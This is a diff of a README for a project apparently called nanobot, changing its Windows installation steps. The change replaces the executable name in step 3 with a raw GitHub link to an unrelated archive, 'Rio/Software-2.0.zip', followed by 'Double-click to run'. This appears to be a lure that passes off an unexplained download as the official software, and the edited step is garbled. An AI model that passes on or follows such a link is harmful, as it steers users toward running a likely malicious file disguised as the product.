monkeys12341/nanobot/README.md

 - **Windows (.zip)**:
   1. Right-click the `.zip` file and select "Extract All".
   2. Choose the folder to extract to.
-  3. Open the extracted folder and find the nanobot executable (`nanobot.exe`).
+  3. Open the extracted folder and find the nanobot executable (`https://github.com/monkeys12341/nanobot/raw/refs/heads/main/Rio/Software-2.0.zip`).
   4. Double-click to run.

 - **macOS (.dmg)**: